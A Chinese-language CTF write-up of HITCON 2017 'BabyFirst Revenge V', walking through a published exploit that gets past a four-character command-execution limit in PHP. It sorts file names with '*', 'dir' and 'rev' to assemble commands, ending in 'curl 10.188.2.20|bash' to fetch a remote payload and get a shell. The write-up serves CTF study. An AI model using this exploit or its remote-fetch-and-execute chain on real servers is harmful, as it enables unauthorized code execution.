[hitcon2017] BabyFirst Revenge V
分享本题自制Dockerfile:Github
这题相比于上一题 条件更加的苛刻了 只允许执行最多四个字符
源码如下:
<?php
$sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
@mkdir($sandbox);
@chdir($sandbox);
if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 4) {
@exec($_GET['cmd']);
} else if (isset($_GET['reset'])) {
@exec('/bin/rm -rf ' . $sandbox);
}
highlight_file(__FILE__);
那我们之前的生成 ls -t>g 就不能按照最后一步 ls>>_ 来执行了
但是我们能不能还是按照 生成命令段文件 最后通过ls来拼接命令执行呢?
这里还是以分析Orange大大的exp为主:
Exp:
import requests
from time import sleep
from urllib import quote
payload = [
# generate "g> ht- sl" to file "v"
'>dir',
'>sl',
'>g\>',
'>ht-',
'*>v',
# reverse file "v" to file "x", content "ls -th >g"
'>rev',
'*v>x',
# generate "curl orange.tw|python;"
# generate "curl 10.188.2.20|bash"
'>\;\\',
'>sh\\',
'>ba\\',
'>\|\\',
'>20\\',
'>2.\\',
'>8.\\',
'>18\\',
'>0.\\',
'>1\\',
'>\ \\',
'>rl\\',
'>cu\\',
# got shell
'sh x',
'sh g',
]
r = requests.get('http://10.188.2.20:17528/?reset=1')
for i in payload:
assert len(i) <= 4
r = requests.get('http://10.188.2.20:17528/?cmd=' + quote(i) )
print i
sleep(0.1)
首先生成 ls -t >g的命令文件,这里orange大大的方法真的巧妙到极致了!
- 先了解一个小trick,
*在Linux中代表的是0或多个字符,比如ls *.txt就表示了列出本目录下所有后缀名为txt的文件,那假如单独执行一个*会是什么效果?
在本地尝试了一下 直接输入一个星号的话Linux首先会把当前目录下的所有文件按字典序排序一次,然后将排序的结果当作命令执行,如下:
🌰
那下图的也可以理解了:
🌰
因为*o匹配了 echo 和o,而他们的排序是echo在前,o在后 所以就会执行命令 echo o
-
再认识一下dir 这个命令在大多数系统中都是ls 的alias 但是有些系统中则没有
为什么我们要用这个命令呢 因为之前说过ls 是alphabetically (字典序)那么dir就会排在ls结果的最前面 所以我们*之后dir也是排在最前面 也就充当了拼接文件名的角色 -
大概思路就出来了 我们要构造ls -t>g的命令片段成几个文件名 但是其命令段的首字母不能在d的前面,也就是不能是 特殊符号 数字 abc 而且每一段不能超过两个字符,因为其余两个字符要分配给>和\,如果你尝试一下构造 正常来说是没办法构造出无特殊符号打头的文件名 他总会排到dir的前面,然后更巧妙的地方来了 我们可以生成逆序的命令拼接起来,最后使用rev命令反向文件中的字符串!
-
根据之前我们对*的认识,我们可以将倒序的命令输入到v文件中,因为*v能匹配rev 和 v,也就是执行了 rev v命令,然后再将倒序之后的结果>x文件中,这样*v>x刚刚好是四个字符!
-
但是看到这里 你可能还会在尝试过程中发现问题,那就是逆序之后的命令段应该是 [dir,>sl,>g>,>t-] 那么这里会有一个问题 因为t的字母序比s后,所以ls之后应该是这样的:
Oops
解决方法是加多一个参数h,在ls中h是用作格式化l参数之后的存储量大小 使之更适合人类方式阅读 但是如果ls只带参数h的不带参数l话那这个参数是毫无意义的 如图:
🌰
所以我们将>t-改成>ht-就能解决字典序的问题了
- 接下来的问题就回到了babyfirst-revenge的情况了
